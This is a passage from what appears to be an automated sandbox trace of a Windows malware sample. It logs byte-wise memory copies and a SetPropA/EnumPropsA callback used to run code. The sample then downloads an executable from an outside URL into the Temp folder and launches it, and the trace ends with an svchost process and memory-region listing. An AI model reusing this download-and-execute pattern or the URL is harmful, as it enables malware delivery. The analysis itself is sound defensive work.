RtlMoveMemory (in: Destination=0x5c80610, Source=0x18a590, Length=0x1 | out: Destination=0x5c80610) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c80611, Source=0x18a590, Length=0x1 | out: Destination=0x5c80611) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c80612, Source=0x18a590, Length=0x1 | out: Destination=0x5c80612) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c80613, Source=0x18a590, Length=0x1 | out: Destination=0x5c80613) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c80614, Source=0x18a590, Length=0x1 | out: Destination=0x5c80614) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c80615, Source=0x18a590, Length=0x1 | out: Destination=0x5c80615) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c80616, Source=0x18a590, Length=0x1 | out: Destination=0x5c80616) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c80617, Source=0x18a590, Length=0x1 | out: Destination=0x5c80617) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c80618, Source=0x18a590, Length=0x1 | out: Destination=0x5c80618) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c80619, Source=0x18a590, Length=0x1 | out: Destination=0x5c80619) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c8061a, Source=0x18a590, Length=0x1 | out: Destination=0x5c8061a) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c8061b, Source=0x18a590, Length=0x1 | out: Destination=0x5c8061b) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c8061c, Source=0x18a590, Length=0x1 | out: Destination=0x5c8061c) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c8061d, Source=0x18a590, Length=0x1 | out: Destination=0x5c8061d) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c8061e, Source=0x18a590, Length=0x1 | out: Destination=0x5c8061e) [0104.935] GetLastError () returned 0x0 [0104.935] RtlMoveMemory (in: Destination=0x5c8061f, Source=0x18a590, Length=0x1 | out: Destination=0x5c8061f) [0104.935] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c80620, Source=0x18a590, Length=0x1 | out: Destination=0x5c80620) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c80621, Source=0x18a590, Length=0x1 | out: Destination=0x5c80621) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c80622, Source=0x18a590, Length=0x1 | out: Destination=0x5c80622) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c80623, Source=0x18a590, Length=0x1 | out: Destination=0x5c80623) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c80624, Source=0x18a590, Length=0x1 | out: Destination=0x5c80624) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c80625, Source=0x18a590, Length=0x1 | out: Destination=0x5c80625) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c80626, Source=0x18a590, Length=0x1 | out: Destination=0x5c80626) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c80627, Source=0x18a590, Length=0x1 | out: Destination=0x5c80627) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c80628, Source=0x18a590, Length=0x1 | out: Destination=0x5c80628) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c80629, Source=0x18a590, Length=0x1 | out: Destination=0x5c80629) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c8062a, Source=0x18a590, Length=0x1 | out: Destination=0x5c8062a) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c8062b, Source=0x18a590, Length=0x1 | out: Destination=0x5c8062b) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c8062c, Source=0x18a590, Length=0x1 | out: Destination=0x5c8062c) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c8062d, Source=0x18a590, Length=0x1 | out: Destination=0x5c8062d) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c8062e, Source=0x18a590, Length=0x1 | out: Destination=0x5c8062e) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c8062f, Source=0x18a590, Length=0x1 | out: Destination=0x5c8062f) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c80630, Source=0x18a590, Length=0x1 | out: Destination=0x5c80630) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c80631, Source=0x18a590, Length=0x1 | out: Destination=0x5c80631) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c80632, Source=0x18a590, Length=0x1 | out: Destination=0x5c80632) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c80633, Source=0x18a590, Length=0x1 | out: Destination=0x5c80633) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c80634, Source=0x18a590, Length=0x1 | out: Destination=0x5c80634) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c80635, Source=0x18a590, Length=0x1 | out: Destination=0x5c80635) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c80636, Source=0x18a590, Length=0x1 | out: Destination=0x5c80636) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c80637, Source=0x18a590, Length=0x1 | out: Destination=0x5c80637) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c80638, Source=0x18a590, Length=0x1 | out: Destination=0x5c80638) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c80639, Source=0x18a590, Length=0x1 | out: Destination=0x5c80639) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c8063a, Source=0x18a590, Length=0x1 | out: Destination=0x5c8063a) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c8063b, Source=0x18a590, Length=0x1 | out: Destination=0x5c8063b) [0104.936] GetLastError () returned 0x0 [0104.936] RtlMoveMemory (in: Destination=0x5c8063c, Source=0x18a590, Length=0x1 | out: Destination=0x5c8063c) [0104.936] GetLastError () returned 0x0 [0104.937] RtlMoveMemory (in: Destination=0x5c8063d, Source=0x18a590, Length=0x1 | out: Destination=0x5c8063d) [0104.937] GetLastError () returned 0x0 [0104.937] RtlMoveMemory (in: Destination=0x5c8063e, Source=0x18a590, Length=0x1 | out: Destination=0x5c8063e) [0104.937] GetLastError () returned 0x0 [0104.937] RtlMoveMemory (in: Destination=0x5c8063f, Source=0x18a590, Length=0x1 | out: Destination=0x5c8063f) [0104.937] GetLastError () returned 0x0 [0104.937] RtlMoveMemory (in: Destination=0x5c80640, Source=0x18a590, Length=0x1 | out: Destination=0x5c80640) [0104.937] GetLastError () returned 0x0 [0104.937] RtlMoveMemory (in: Destination=0x5c80641, Source=0x18a590, Length=0x1 | out: Destination=0x5c80641) [0104.937] GetLastError () returned 0x0 [0104.937] RtlMoveMemory (in: Destination=0x5c80642, Source=0x18a590, Length=0x1 | out: Destination=0x5c80642) [0104.937] GetLastError () returned 0x0 [0104.937] RtlMoveMemory (in: Destination=0x5c80643, Source=0x18a590, Length=0x1 | out: Destination=0x5c80643) [0104.937] GetLastError () returned 0x0 [0104.937] RtlMoveMemory (in: Destination=0x5c80644, Source=0x18a590, Length=0x1 | out: Destination=0x5c80644) [0104.937] GetLastError () returned 0x0 [0104.937] RtlMoveMemory (in: Destination=0x5c80645, Source=0x18a590, Length=0x1 | out: Destination=0x5c80645) [0104.937] GetLastError () returned 0x0 [0104.937] RtlMoveMemory (in: Destination=0x5c80646, Source=0x18a590, Length=0x1 | out: Destination=0x5c80646) [0104.937] GetLastError () returned 0x0 [0104.937] RtlMoveMemory (in: Destination=0x5c80647, Source=0x18a590, Length=0x1 | out: Destination=0x5c80647) [0104.937] GetLastError () returned 0x0 [0104.937] RtlMoveMemory (in: Destination=0x5c80648, Source=0x18a590, Length=0x1 | out: Destination=0x5c80648) [0104.937] GetLastError () returned 0x0 [0104.937] RtlMoveMemory (in: Destination=0x5c80649, Source=0x18a590, Length=0x1 | out: Destination=0x5c80649) [0104.937] GetLastError () returned 0x0 [0104.937] RtlMoveMemory (in: Destination=0x5c8064a, Source=0x18a590, Length=0x1 | out: Destination=0x5c8064a) [0104.937] GetLastError () returned 0x0 [0104.937] RtlMoveMemory (in: Destination=0x5c8064b, Source=0x18a590, Length=0x1 | out: Destination=0x5c8064b) [0104.937] GetLastError () returned 0x0 [0104.937] RtlMoveMemory (in: Destination=0x5c8064c, Source=0x18a590, Length=0x1 | out: Destination=0x5c8064c) [0104.937] GetLastError () returned 0x0 [0104.937] RtlMoveMemory (in: Destination=0x5c8064d, Source=0x18a590, Length=0x1 | out: Destination=0x5c8064d) [0104.937] GetLastError () returned 0x0 [0104.937] RtlMoveMemory (in: Destination=0x5c8064e, Source=0x18a590, Length=0x1 | out: Destination=0x5c8064e) [0104.937] GetLastError () returned 0x0 [0104.937] RtlMoveMemory (in: Destination=0x5c8064f, Source=0x18a590, Length=0x1 | out: Destination=0x5c8064f) [0104.937] GetLastError () returned 0x0 [0104.937] RtlMoveMemory (in: Destination=0x5c80650, Source=0x18a590, Length=0x1 | out: Destination=0x5c80650) [0104.937] GetLastError () returned 0x0 [0104.937] RtlMoveMemory (in: Destination=0x5c80651, Source=0x18a590, Length=0x1 | out: Destination=0x5c80651) [0104.937] GetLastError () returned 0x0 [0104.937] RtlMoveMemory (in: Destination=0x5c80652, Source=0x18a590, Length=0x1 | out: Destination=0x5c80652) [0104.937] GetLastError () returned 0x0 [0104.937] RtlMoveMemory (in: Destination=0x5c80653, Source=0x18a590, Length=0x1 | out: Destination=0x5c80653) [0104.937] GetLastError () returned 0x0 [0104.937] RtlMoveMemory (in: Destination=0x5c80654, Source=0x18a590, Length=0x1 | out: Destination=0x5c80654) [0104.937] GetLastError () returned 0x0 [0104.937] RtlMoveMemory (in: Destination=0x5c80655, Source=0x18a590, Length=0x1 | out: Destination=0x5c80655) [0104.938] GetLastError () returned 0x0 [0104.938] RtlMoveMemory (in: Destination=0x5c80656, Source=0x18a590, Length=0x1 | out: Destination=0x5c80656) [0104.938] GetLastError () returned 0x0 [0104.938] RtlMoveMemory (in: Destination=0x5c80657, Source=0x18a590, Length=0x1 | out: Destination=0x5c80657) [0104.938] GetLastError () returned 0x0 [0104.938] RtlMoveMemory (in: Destination=0x5c80658, Source=0x18a590, Length=0x1 | out: Destination=0x5c80658) [0104.938] GetLastError () returned 0x0 [0104.938] RtlMoveMemory (in: Destination=0x5c80659, Source=0x18a590, Length=0x1 | out: Destination=0x5c80659) [0104.938] GetLastError () returned 0x0 [0104.938] RtlMoveMemory (in: Destination=0x5c8065a, Source=0x18a590, Length=0x1 | out: Destination=0x5c8065a) [0104.938] GetLastError () returned 0x0 [0104.938] RtlMoveMemory (in: Destination=0x5c8065b, Source=0x18a590, Length=0x1 | out: Destination=0x5c8065b) [0104.938] GetLastError () returned 0x0 [0104.938] RtlMoveMemory (in: Destination=0x5c8065c, Source=0x18a590, Length=0x1 | out: Destination=0x5c8065c) [0104.938] GetLastError () returned 0x0 [0104.938] RtlMoveMemory (in: Destination=0x5c8065d, Source=0x18a590, Length=0x1 | out: Destination=0x5c8065d) [0104.938] GetLastError () returned 0x0 [0104.938] RtlMoveMemory (in: Destination=0x5c8065e, Source=0x18a590, Length=0x1 | out: Destination=0x5c8065e) [0104.938] GetLastError () returned 0x0 [0104.938] RtlMoveMemory (in: Destination=0x5c8065f, Source=0x18a590, Length=0x1 | out: Destination=0x5c8065f) [0104.938] GetLastError () returned 0x0 [0104.938] RtlMoveMemory (in: Destination=0x5c80660, Source=0x18a590, Length=0x1 | out: Destination=0x5c80660) [0104.938] GetLastError () returned 0x0 [0104.938] RtlMoveMemory (in: Destination=0x5c80661, Source=0x18a590, Length=0x1 | out: Destination=0x5c80661) [0104.938] GetLastError () returned 0x0 [0104.938] RtlMoveMemory (in: Destination=0x5c80662, Source=0x18a590, Length=0x1 | out: Destination=0x5c80662) [0104.938] GetLastError () returned 0x0 [0104.938] RtlMoveMemory (in: Destination=0x5c80663, Source=0x18a590, Length=0x1 | out: Destination=0x5c80663) [0104.938] GetLastError () returned 0x0 [0104.938] RtlMoveMemory (in: Destination=0x5c80664, Source=0x18a590, Length=0x1 | out: Destination=0x5c80664) [0104.938] GetLastError () returned 0x0 [0104.938] RtlMoveMemory (in: Destination=0x5c80665, Source=0x18a590, Length=0x1 | out: Destination=0x5c80665) [0104.938] GetLastError () returned 0x0 [0104.938] RtlMoveMemory (in: Destination=0x5c80666, Source=0x18a590, Length=0x1 | out: Destination=0x5c80666) [0104.938] GetLastError () returned 0x0 [0104.938] RtlMoveMemory (in: Destination=0x5c80667, Source=0x18a590, Length=0x1 | out: Destination=0x5c80667) [0104.938] GetLastError () returned 0x0 [0104.938] RtlMoveMemory (in: Destination=0x5c80668, Source=0x18a590, Length=0x1 | out: Destination=0x5c80668) [0104.938] GetLastError () returned 0x0 [0104.938] RtlMoveMemory (in: Destination=0x5c80669, Source=0x18a590, Length=0x1 | out: Destination=0x5c80669) [0104.938] GetLastError () returned 0x0 [0104.938] RtlMoveMemory (in: Destination=0x5c8066a, Source=0x18a590, Length=0x1 | out: Destination=0x5c8066a) [0104.938] GetLastError () returned 0x0 [0104.938] RtlMoveMemory (in: Destination=0x5c8066b, Source=0x18a590, Length=0x1 | out: Destination=0x5c8066b) [0104.938] GetLastError () returned 0x0 [0104.938] RtlMoveMemory (in: Destination=0x5c8066c, Source=0x18a590, Length=0x1 | out: Destination=0x5c8066c) [0104.938] GetLastError () returned 0x0 [0104.938] RtlMoveMemory (in: Destination=0x5c8066d, Source=0x18a590, Length=0x1 | out: Destination=0x5c8066d) [0104.938] GetLastError () returned 0x0 [0104.938] RtlMoveMemory (in: Destination=0x5c8066e, Source=0x18a590, Length=0x1 | out: Destination=0x5c8066e) [0104.938] GetLastError () returned 0x0 [0104.938] RtlMoveMemory (in: Destination=0x5c8066f, Source=0x18a590, Length=0x1 | out: Destination=0x5c8066f) [0104.938] RtlMoveMemory (in: Destination=0x5c80670, Source=0x18a590, Length=0x1 | out: Destination=0x5c80670) [0104.938] RtlMoveMemory (in: Destination=0x5c80671, Source=0x18a590, Length=0x1 | out: Destination=0x5c80671) [0104.939] GetDesktopWindow () returned 0x10010 [0104.939] SetPropA (hWnd=0x10010, lpString="eSV", hData=0x1) returned 1 [0104.939] GetProcAddress (hModule=0x75930000, lpProcName="EnumPropsA") returned 0x7598863e [0104.940] EnumPropsA (hWnd=0x10010, lpEnumFunc=0x5c80578) [0104.940] GetProcAddress (hModule=0x76df0000, lpProcName="ExitProcess") returned 0x76e07a10 [0104.941] LoadLibraryA (lpLibFileName="Urlmon") returned 0x77170000 [0104.941] GetProcAddress (hModule=0x77170000, lpProcName="URLDownloadToFileW") returned 0x772066f6 [0104.941] LoadLibraryA (lpLibFileName="Shell32") returned 0x76100000 [0104.942] GetProcAddress (hModule=0x76100000, lpProcName="ShellExecuteW") returned 0x76113c71 [0104.942] GetProcAddress (hModule=0x76df0000, lpProcName="ExpandEnvironmentStringsW") returned 0x76e04173 [0104.942] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x189e90, nSize=0x104 | out: lpDst="C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp") returned 0x25 [0104.960] URLDownloadToFileW (param_1=0x0, param_2="http://kdotraky.com/kat/val.exe", param_3="C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe" (normalized: "c:\\users\\kft6utqw\\appdata\\local\\temp\\heidi.exe"), param_4=0x0, param_5=0x0) returned 0x0 [0123.569] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0123.667] ExitProcess (uExitCode=0x0) [0123.757] ComPs_NdrDllCanUnloadNow () returned 0x1 [0123.757] FreeLibrary (hLibModule=0x65300000) returned 1 [0123.757] UnregisterClassA (lpClassName="DFrame", hInstance=0x65000000) returned 0 [0123.757] UnregisterClassA (lpClassName="CBar", hInstance=0x65000000) returned 0 [0123.757] UnregisterClassA (lpClassName="CBarPopup", hInstance=0x65000000) returned 0 [0123.757] UnregisterClassA (lpClassName="CPal", hInstance=0x65000000) returned 0 [0123.757] UnregisterClassA (lpClassName="DesignerWindow", hInstance=0x65000000) returned 0 [0123.757] UnregisterClassA (lpClassName="DockingView", hInstance=0x65000000) returned 0 [0123.757] UnregisterClassA (lpClassName="GenericPane", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="FontPopup", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="HiddenRpcWindow", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="IbPaneWndClass", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="NameListWndClass", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="ObPaneWndClass", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="ObtbarWndClass", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="OfVbEg", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="PbrsHost", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="PIXPOP", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="PopupTipWndClass", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="PROJECT", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="ToolsPalette", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="THUNDER_HwndBmpInProgress", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="ThunderMain", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="Thunder", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="ThunderRT6", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="ThunderRT6Main", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="VbaWindow", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="VBBubble", hInstance=0x65000000) returned 1 [0123.759] UnregisterClassA (lpClassName="VBBubbleRT6", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="vbeCodeWindow", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="VBFloatingPalette", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="VBFocus", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="VBFocusRT6", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="VBMdiChildHack", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="VBMDITempChild", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="VBMDITempChildRT6", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="VBMsoStdCompMgr", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="VBSplash", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="VBSlider", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="wndclass_desked_gsk", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="wndclass_flex_gsk", hInstance=0x65000000) returned 0 [0123.759] UnregisterClassA (lpClassName="wndclass_pbrs", hInstance=0x65000000) returned 0 Thread: id = 24 os_tid = 0x9c8 Thread: id = 25 os_tid = 0x9cc Thread: id = 26 os_tid = 0x9d0 Thread: id = 27 os_tid = 0x9d4 Thread: id = 28 os_tid = 0x9d8 Thread: id = 29 os_tid = 0x9dc Thread: id = 30 os_tid = 0x9e0 Thread: id = 31 os_tid = 0x9e4 Thread: id = 45 os_tid = 0xa38 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1aef6000" os_pid = "0x3d8" os_integrity_level = "0x4000" os_privileges = "0x60801000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x930" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d6a3" [0xc000000f], "LOCAL" [0x7] Region: id = 615 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 616 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 617 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 618 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 619 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 620 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 621 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 622 start_va = 0x150000 end_va = 0x20ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 623 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 624 start_va = 0x310000 end_va = 0x310fff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 625 start_va = 0x320000 end_va = 0x320fff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 626 start_va = 0x330000 end_va = 0x330fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 627 start_va = 0x370000 end_va = 0x371fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 628 start_va = 0x400000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 629 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 630 start_va = 0x510000 end_va = 0x697fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 631 start_va = 0x6a0000 end_va = 0x820fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 632 start_va = 0x830000 end_va = 0xc22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 633 start_va = 0xc30000 end_va = 0xc30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c30000" filename = "" Region: id = 634 start_va = 0xc40000 end_va = 0xc40fff entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 635 start_va = 0xc80000 end_va = 0xc8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 636 start_va = 0xca0000 end_va = 0xcaffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 637 start_va = 0xcd0000 end_va = 0xd4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 638 start_va = 0xe00000 end_va = 0xe7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 639 start_va = 0xf20000 end_va = 0x11eefff entry_point = 0xf20000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 640 start_va = 0x11f0000 end_va = 0x12effff entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 641 start_va = 0x1340000 end_va = 0x13bffff entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Region: id = 642 start_va = 0x13c0000 end_va = 0x14bffff entry_point = 0x0 region_type = private name = "private_0x00000000013c0000" filename = "" Region: id = 643 start_va = 0x14e0000 end_va = 0x155ffff entry_point = 0x0 region_type = private name = "private_0x00000000014e0000" filename = "" Region: id = 644 start_va = 0x1590000 end_va = 0x160ffff entry_point = 0x0 region_type = private name = "private_0x0000000001590000" filename = "" Region: id = 645 start_va = 0x1620000 end_va = 0x162ffff entry_point = 0x0 region_type = private name = "private_0x0000000001620000" filename = "" Region: id = 646 start_va = 0x1640000 end_va = 0x16bffff entry_point = 0x0 region_type = private name = "private_0x0000000001640000" filename = "" Region: id = 647 start_va = 0x16c0000 end_va = 0x173ffff entry_point = 0x0 region_type = private name = "private_0x00000000016c0000" filename = "" Region: id = 648 start_va = 0x17a0000 end_va = 0x181ffff entry_point = 0x0 region_type = private name = "private_0x00000000017a0000" filename = "" Region: id = 649 start_va = 0x18f0000 end_va = 0x196ffff entry_point = 0x0 region_type = private name = "private_0x00000000018f0000" filename = "" Region: id = 650 start_va = 0x1970000 end_va = 0x19effff entry_point = 0x0 region_type = private name = "private_0x0000000001970000" filename = "" Region: id = 651 start_va = 0x19f0000 end_va = 0x1aaffff entry_point = 0x19f0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 652 start_va = 0x1ae0000 end_va = 0x1b5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ae0000" filename = "" Region: id = 653 start_va = 0x1b60000 end_va = 0x1c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b60000" filename = "" Region: id = 654 start_va = 0x1d50000 end_va = 0x1dcffff entry_point = 0x0 region_type = private name = "private_0x0000000001d50000" filename = "" Region: id = 655 start_va = 0x1dd0000 end_va = 0x1e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001dd0000" filename = "" Region: id = 656 start_va = 0x1ea0000 end_va = 0x1f1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 657 start_va = 0x1f20000 end_va = 0x211ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 658 start_va = 0x2260000 end_va = 0x22dffff entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 659 start_va = 0x74270000 end_va = 0x74272fff entry_point = 0x74270000 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 660 start_va = 0x77760000 end_va = 0x77859fff entry_point = 0x77760000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 661 start_va = 0x77860000 end_va = 0x7797efff entry_point = 0x77860000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 662 start_va = 0x77980000 end_va = 0x77b28fff entry_point = 0x77980000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 663 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 664 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 665 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 666 start_va = 0xff2a0000 end_va = 0xff2aafff 